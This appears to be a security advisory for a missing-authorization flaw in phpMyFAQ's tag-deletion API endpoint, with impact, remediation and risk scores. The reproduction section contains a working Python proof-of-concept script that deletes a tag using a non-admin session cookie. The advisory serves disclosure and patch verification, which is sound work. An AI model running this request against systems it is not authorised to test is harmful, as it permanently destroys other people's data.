phpMyFAQ Missing Authorization Vulnerability in Tag Deletion Endpoint

Vulnerability

A missing authorization vulnerability has been identified in phpMyFAQ versions prior to 4.1.2. The issue resides in the DELETE /admin/api/content/tags/{tagId} endpoint, which executes the tag deletion without checking that the caller holds the admin-side permission for it. Any authenticated user, including a regular frontend user, can therefore delete arbitrary tags by sending a DELETE request that carries a valid session cookie; no admin role is required. Deleted tags cannot be recovered without a database backup.

Impact

Exploitation of this vulnerability allows any authenticated user to delete tags, leading to permanent data loss and disruption of FAQ organization. Because the endpoint only requires a valid session, the bar for an attacker is a frontend account, which on installations with self-registration is available to anyone. In large installations with extensive tag taxonomies, this could significantly degrade usability.

Reproduction

To reproduce this vulnerability, first register as a regular user on the phpMyFAQ frontend or use an existing non-admin authenticated session. Once logged in as a non-admin user, send a DELETE request to the /admin/api/content/tags/{tagId} endpoint, substituting the numeric ID of the target tag and including the PHPSESSID cookie from the authenticated session. The request is processed successfully and the specified tag is deleted, despite the lack of proper authorization. Note that the deletion is irreversible, so any verification on a live installation should target a disposable tag.
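The following script is an added example for checking an installation against the request described above; it is not part of this advisory or of the phpMyFAQ project. It builds the DELETE request exactly as the advisory describes (only the PHPSESSID cookie of a non-admin session, no further headers) and turns the response into a verdict. The status-code interpretation is an assumption: the advisory only states that a vulnerable version processes the request successfully, so a 2xx is read as "vulnerable", 401/403 as "patched", and anything else as inconclusive. The base URL, tag ID and session ID are supplied by the caller.

```python
"""Check whether a phpMyFAQ instance lets a non-admin session delete a tag.

Added example, not phpMyFAQ code. Assumptions not stated by the advisory:
a 2xx response means the delete was executed, 401/403 means authorization
is now enforced. The request is destructive on a vulnerable host, so use
a disposable tag ID.
"""
import re
import sys
import urllib.error
import urllib.request
from urllib.parse import urljoin

ENDPOINT_TEMPLATE = "admin/api/content/tags/{tag_id}"

# PHP session IDs use 0-9, a-z, A-Z, ',' and '-' depending on
# session.sid_bits_per_character; anything else is rejected so that a
# malformed value cannot smuggle a second cookie into the header.
SESSID_RE = re.compile(r"^[A-Za-z0-9,-]+$")


def endpoint_path(tag_id: int) -> str:
    """Relative path of the affected endpoint for one numeric tag ID."""
    if tag_id <= 0:
        raise ValueError("tag id must be a positive integer")
    return ENDPOINT_TEMPLATE.format(tag_id=tag_id)


def build_request(base_url: str, tag_id: int, php_sessid: str) -> urllib.request.Request:
    """Build the DELETE request from the advisory: a non-admin PHPSESSID
    cookie is the only credential attached, no admin-only header."""
    if not SESSID_RE.match(php_sessid):
        raise ValueError("PHPSESSID contains characters not valid in a PHP session id")
    url = urljoin(base_url.rstrip("/") + "/", endpoint_path(tag_id))
    req = urllib.request.Request(url, method="DELETE")
    req.add_header("Cookie", f"PHPSESSID={php_sessid}")
    req.add_header("Accept", "application/json")
    return req


def classify(status: int) -> str:
    """Map the HTTP status to a verdict (assumed interpretation, see lead-in)."""
    if 200 <= status < 300:
        return "vulnerable"   # a frontend session deleted an admin-managed resource
    if status in (401, 403):
        return "patched"      # the endpoint now refuses the non-admin session
    return "inconclusive"     # e.g. 404 for an unknown tag ID or a moved endpoint


def run_check(base_url: str, tag_id: int, php_sessid: str) -> str:
    """Send the request and return the verdict. Destructive on a vulnerable
    host: the tag really is deleted, so point this at a disposable tag."""
    req = build_request(base_url, tag_id, php_sessid)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            status = resp.status
    except urllib.error.HTTPError as err:
        status = err.code
    return classify(status)


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} BASE_URL TAG_ID PHPSESSID")
    print(run_check(sys.argv[1], int(sys.argv[2]), sys.argv[3]))
```

Run it with the base URL of the installation, the ID of a tag you are willing to lose, and the PHPSESSID of a logged-in frontend (non-admin) session. A "vulnerable" verdict on a version before 4.1.2 is the expected result; the same run against 4.1.2 or later should yield "patched".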

Remediation

Users are advised to update phpMyFAQ to version 4.1.2 or later, where the endpoint has been fixed to enforce authorization before deleting a tag.

Added: May 15, 2026, 7:28 PM
Updated: May 15, 2026, 7:28 PM

Vulnerability Rating

Custom Algorithm

spread: 3.1
impact: 0.6
exploitability: 6.6
remediation: 7.7
relevance: 8.4
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.